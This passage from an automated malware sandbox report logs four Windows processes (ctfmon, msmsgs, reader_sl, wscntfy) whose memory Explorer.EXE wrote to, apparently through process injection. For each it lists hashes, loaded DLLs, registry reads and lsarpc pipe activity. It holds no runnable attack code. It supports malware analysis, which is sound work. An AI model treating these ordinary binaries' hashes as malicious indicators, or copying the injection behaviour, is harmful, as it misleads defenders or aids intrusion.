Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
6.a) ctfmon.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
6.b) ctfmon.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[#############################################################################]
7. msmsgs.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: msmsgs.exe
MD5: 3e930c641079443d4de036167a69caa2
SHA-1: ac40479e28fb680aff76e41fa14ebe18b3392629
File Size: 1695232 Bytes
Command Line: "C:\Program Files\Messenger\msmsgs.exe" /background
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\WSOCK32.dll ],
Base Address: [0x71AD0000 ], Size: [0x00009000 ]
Module Name: [ C:\WINDOWS\system32\WS2_32.dll ],
Base Address: [0x71AB0000 ], Size: [0x00017000 ]
Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ],
Base Address: [0x71AA0000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\comdlg32.dll ],
Base Address: [0x763B0000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5512_x-ww_dfb54e0c\gdiplus.dll ],
Base Address: [0x4EC50000 ], Size: [0x001A6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\cryptdll.dll ],
Base Address: [0x76790000 ], Size: [0x0000C000 ]
Module Name: [ C:\WINDOWS\system32\iphlpapi.dll ],
Base Address: [0x76D60000 ], Size: [0x00019000 ]
Module Name: [ C:\WINDOWS\system32\XPOB2RES.DLL ],
Base Address: [0x10000000 ], Size: [0x0006C000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00890000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\SXS.DLL ],
Base Address: [0x7E720000 ], Size: [0x000B0000 ]
Module Name: [ C:\WINDOWS\system32\es.dll ],
Base Address: [0x77710000 ], Size: [0x00042000 ]
Module Name: [ C:\WINDOWS\system32\wtsapi32.dll ],
Base Address: [0x76F50000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WINSTA.dll ],
Base Address: [0x76360000 ], Size: [0x00010000 ]
Module Name: [ C:\WINDOWS\system32\credui.dll ],
Base Address: [0x76C00000 ], Size: [0x0002E000 ]
[=============================================================================]
7.a) msmsgs.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020420-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ], Value: [ oleaut32.dll ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020420-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ThreadingModel ], Value: [ Both ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020424-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ], Value: [ oleaut32.dll ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{00020424-0000-0000-C000-000000000046}\INPROCSERVER32 ],
Value Name: [ ThreadingModel ], Value: [ Both ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{00020400-0000-0000-C000-000000000046}\PROXYSTUBCLSID32 ],
Value Name: [ ], Value: [ {00020420-0000-0000-C000-000000000046} ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\PROXYSTUBCLSID32 ],
Value Name: [ ], Value: [ {00020424-0000-0000-C000-000000000046} ], 3 times
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\TYPELIB ],
Value Name: [ ], Value: [ {D597DEED-5B9F-11D1-8DD2-00AA004ABD5E} ], 2 times
Key: [ HKLM\SOFTWARE\CLASSES\INTERFACE\{D597BAB1-5B9F-11D1-8DD2-00AA004ABD5E}\TYPELIB ],
Value Name: [ Version ], Value: [ 2.0 ], 2 times
Key: [ HKLM\SOFTWARE\CLASSES\TYPELIB\{00020430-0000-0000-C000-000000000046}\2.0\0\WIN32 ],
Value Name: [ ], Value: [ C:\WINDOWS\system32\stdole2.tlb ], 1 time
Key: [ HKLM\SOFTWARE\CLASSES\TYPELIB\{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}\2.0\0\WIN32 ],
Value Name: [ ], Value: [ C:\WINDOWS\system32\SENS.DLL ], 2 times
Key: [ HKLM\Software\Microsoft\COM3 ],
Value Name: [ REGDBVersion ], Value: [ 0x0b00000000000000 ], 12 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Monitored Registry Keys:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU ],
Watch subtree: [ 1 ], Notify Filter: [ Key Change,Value Change ], 4 times
[=============================================================================]
7.b) msmsgs.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\SENS.DLL ]
File Name: [ C:\WINDOWS\system32\stdole2.tlb ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\system32\SENS.DLL ]
File Name: [ C:\WINDOWS\system32\stdole2.tlb ]
[#############################################################################]
8. reader_sl.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: reader_sl.exe
MD5: 54c88bfbd055621e2306534f445c0c8d
SHA-1: 960a171e826c077187fe634103874644327a6110
File Size: 40048 Bytes
Command Line: "C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe"
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.1433_x-ww_5cf844d2\MSVCP80.dll ],
Base Address: [0x7C420000 ], Size: [0x00087000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.1433_x-ww_5cf844d2\MSVCR80.dll ],
Base Address: [0x78130000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
[=============================================================================]
8.a) reader_sl.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
8.b) reader_sl.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[#############################################################################]
9. wscntfy.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Explorer.EXE wrote to the virtual memory of this process
Filename: wscntfy.exe
MD5: f92e1076c42fcd6db3d72d8cfe9816d5
SHA-1: 549f0a01848375d03159fc74171ed97790fa9650
File Size: 13824 Bytes
Command Line: C:\WINDOWS\system32\wscntfy.exe
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x007C0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\Apphelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
[=============================================================================]
9.a) wscntfy.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
[=============================================================================]
9.b) wscntfy.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
<